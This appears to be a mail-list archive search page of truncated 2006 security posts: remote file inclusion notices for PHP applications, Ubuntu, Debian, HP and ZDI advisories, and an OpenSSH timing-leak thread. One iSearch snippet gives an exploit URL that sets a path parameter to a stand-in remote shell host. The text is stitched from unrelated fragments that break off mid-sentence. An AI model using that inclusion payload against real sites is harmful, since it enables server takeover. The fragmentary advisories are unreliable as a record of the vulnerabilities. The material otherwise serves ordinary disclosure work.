#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex
ECHO_ADV_54$2006
---
[ECHO_ADV_54$2006]vtiger CRM =4.2 (calpath) Multiple Remote File Inclusion
Vulnerability
Hi to all,
While finding buffer overflows in Internet Explorer I
found a memory corruption in the drmstor.dll library
which is a part of the DRM (Digital Rights Management)
software supplied with MS Windows.
The following Proof Of Concept is sufficient enough to
test the vulnerability:
html
!WWW.SiBERSAVASCiLAR.COM!
Title : phpWebSite 0.10.2 Remote File Include Vulnerabilities
#Author: Crackers_Child
On 7 Oct 2006 22:14:00 -, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
#The latest version of iSearch is V2.16 = (index.php) Remote File Inclusion
Exploit
#Vlu Code :
#
#htpp://sitename.com/[scerpitPath]/index.php?isearch_path=http://SHELLURL.COM
$isearch_path = dirname(__FILE__);
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Advisory: eXpBlog = 0.3.5 Cross Site Scripting Vulnerabilities
Release Date: 10/09/2006
Last Modified: 10/09/2006
Author: Tamriel [tamriel at gmx dot net]
Application: eXpBlog = 0.3.5
Risk: Low
Vendor Status: contaced
Marco Ivaldi wrote:
It needs expect, and target ssh hostkey must be already added. I'd be
very interested in knowing the results of tests performed on other
distros and configurations.
Hi Marco,
nice to meet you :-). I tried to do this test over my 10 Mbps lan and
this is the result:
===
Ubuntu Security Notice USN-361-1 October 10, 2006
mozilla vulnerabilities
CVE-2006-2788, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3808, CVE-2006-3809, CVE-2006-3811, CVE-2006-4340,
CVE-2006-4565, CVE-2006-4568,
===
Ubuntu Security Notice USN-360-1 October 10, 2006
awstats vulnerabilities
CVE-2006-3681, CVE-2006-3682
===
A security issue affects the following Ubuntu releases:
Ubuntu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
MHL-2006-001 - Public Advisory
+---+
|Eazy Cart Multiple Security Issues |
+---+
PUBLISHED ON
October 9th,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00579189
Version: 4
HPSBUX02087 SSRT4728 rev.4 - HP-UX running TCP/IP Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon
as
ZDI-06-033: Microsoft Office Excel File Format DATETIME Record Parsing
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-033.html
October 10, 2006
-- CVE ID:
CVE-2006-2387
-- Affected Vendor:
Microsoft
-- Affected Products:
Microsoft Office 2000 SP3
Microsoft Office
ZDI-06-032: Microsoft Office PowerPoint Malformed Slide Notes Rebuilding
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-032.html
October 10, 2006
-- CVE ID:
CVE-2006-3435
-- Affected Vendor:
Microsoft
-- Affected Products:
Microsoft Office 2000 SP3
Microsoft Office
ZDI-06-034: Microsoft Office Word Malformed Chart Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-034.html
October 10, 2006
-- CVE ID:
CVE-2006-3650
-- Affected Vendor:
Microsoft
-- Affected Products:
Microsoft Office 2000 SP3
Microsoft Office XP SP3
===
Ubuntu Security Notice USN-362-1 October 10, 2006
php4, php5 vulnerabilities
CVE-2006-4485, CVE-2006-4486, CVE-2006-4625, CVE-2006-4812
===
A security issue affects the
Hello,
Fedora Core 5 ships the libtool-ltdl library which is used to load
dynamic modules. This package seems to be built with some strange setup
causing a search path of
| $ strings /usr/lib/libltdl.so
|
Hey again,
I know quoting myself is bad form, but i just wanted to clarify a few
points about my recent OpenSSH timing leak post;)
Here we are again... During a recent penetration test i stumbled upon
yet another OpenSSH timing leak, leading to remote disclosure of valid
usernames. It's not
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1195-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
October 10, 2006
-
##
# PHPLibrary = 1.5.3 Remote File Inclusion
# Download Source : http://download.softerra.com/files/PHPLibrary-1.5.3.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia --
##
# tagit2b -- Remote File Inclusion
# Download Source : http://codewalkers.com/codefiles/453_tagit2b.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia -- #newhack[dot]org
##
# claroline = 180rc1 Remote File Inclusion
# Download Source : http://www.claroline.net/dlarea/claroline180rc1.tar.gz
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia --
##
# blueshoes = 4.6_public Remote File Inclusion
# Download Source : http://download.blueshoes.org/blueshoes-4.6_public.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia --
Advisory:
The new Flash player adds network functions!
Details:
With a minor amount of fanfare binary socket support has been
added to Flash Player 9 / ActionScript 3.0. The Flash sandbox model
is primarily focused on preventing modifications to the local system,
and thus there are many ways to
FreeBSD ptrace PT_LWPINFO Denial of Service Vulnerability
iDefense Security Advisory 10.10.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 10, 2006
I. BACKGROUND
FreeBSD is a modern operating system for x86, amd64, Alpha, IA-64, PC-98
and SPARC architectures. It's based on the UNIX
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:181
http://www.mandriva.com/security/
25 matches
Mail list logo